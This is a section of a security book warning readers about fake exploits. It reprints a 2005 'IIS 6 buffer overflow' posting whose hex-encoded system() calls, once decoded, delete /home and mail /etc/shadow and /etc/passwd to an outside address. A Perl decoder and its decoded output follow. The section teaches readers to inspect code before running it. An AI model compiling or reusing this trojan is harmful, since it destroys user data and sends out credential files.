Warning





Warning

Take heed to this warning. In this underground world of information warfare, there are very few rules. Ultimately you are responsible for your actions and for your own protection. Once you step into this arena you better empower yourself with knowledge. There are those out there that prey on the uninformed and try to fool others into taking unwanted action on their own systems. Here’s an example so you can consider yourself warned.

In April 2005, someone posted an exploit entitled “IIS 6 Remote Buffer Overflow Exploit.” As of the writing of this book, it is still visible at http://seclists.org/lists/fulldisclosure/2005/Apr/0412.html. To the naked eye this seemed like a legitimate discovery of an IIS 6 exploit. Take a look at the posted source code:


/* Proof of concept code
   Please don't send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer than 6998 chars.
   Can get messy but enough testing, and we have
   found a way in.

   VENDOR STATUS: Notified
   FIX: In process

   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
    + Connecting to host...
    + Connected.
    + Inserting Shellcode...
    + Done...
    + Spawining shell..

    Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.
   C:\>

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

main()
{

//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);

//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

 // for(int j; j < 30; j++)
        {
        //Find socket remote address fault
        printf(".");
        }
//overtake inetinfo here IIS_666666^
return 0;
}

Many things should have triggered your suspicions about this source code. I will not go into a listing of those areas, but the obvious knowledge of C is necessary. To show you the severity of what would have taken place if this code was irresponsibly downloaded and compiled, examine the fact that there are some calls to a method named system while the rest of the code is commented. You need to convert the shellcode to printable ASCII and take a look at what the system calls will try to do (locally on your computer). The following very basic Perl script will help you out:


#!/usr/bin/perl -w
#
# This script provides very basic functionality for
# converting \xXX hex to ASCII and vice versa.
# It expects the input to be converted to be in a file.
#
# File:   hex2ascii.pl
# Author: Andres Andreu <andres [at] neurofuzz dot com>
#

use strict;
use Getopt::Std;

#Define initial hash
my %opts=();
getopts("f:xa", \%opts);

#Define initial variables
my ($infile, $hex);
my ($gen_hex, $gen_ascii);

# Usage Statement
sub usage() {
   print "$0 -f <file> [-x | -a] \n\t";
   print '-f <path to input file>'."\n\t";
   print '-x convert "\xXX" hex to readable ascii'."\n\t";
   print '-a convert ascii to "\xXX" hex'."\n\t";
   print "\n";
   exit;
}

$infile = $opts{f};

$gen_hex = $opts{a};
$gen_ascii = $opts{x};

if ((!$opts{f}) || (!$gen_hex && !$gen_ascii)) {
   usage();
   exit;
}

if ($infile) {
   open(INFILE,$infile) || die "Error opening '$infile': $!\n";
   while (<INFILE>) {
      # strip newlines
      s/\n//g;
      # strip tabs
      s/\t//g;
      # strip quotes
      s/"//g;
      $hex .= $_;
   }
}

if ($gen_ascii) {
   # \xXX hex style to ASCII
   $hex =~ s/\\x([a-fA-F0-9]{2,2})/chr(hex($1))/eg;
} elsif ($gen_hex) {
   # ASCII to \xXX hex
   $hex =~ s/([\W|\w])/"\\x" . uc(sprintf("%2.2x",ord($1)))/eg;
}

print "\n$hex\n";

if ($infile) {
   close(INFILE);
}

Take each array from the C source code and save the shellcode out to files named exactly as the array dot text. So the content from char shellcode[] goes into shellcode.txt and so forth. Pass each one in as a param with the -f switch and take a disturbing look:

perl hex2ascii.pl -f shellcode.txt -x

/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

perl hex2ascii.pl -f launcher.txt -x

cat /etc/shadow |mail [email protected] ;

hex2ascii.pl -f netcat_shell.txt -x

cat /etc/passwd |mail [email protected] ;

As you can clearly see, you may have ended up in an unpleasant situation if you had just taken this source, compiled it, and run the output.

Previous Section
Next Section


 Python   SQL   Java   php   Perl 
 game development   web development   internet   *nix   graphics   hardware 
 telecommunications   C++ 
 Flash   Active Directory   Windows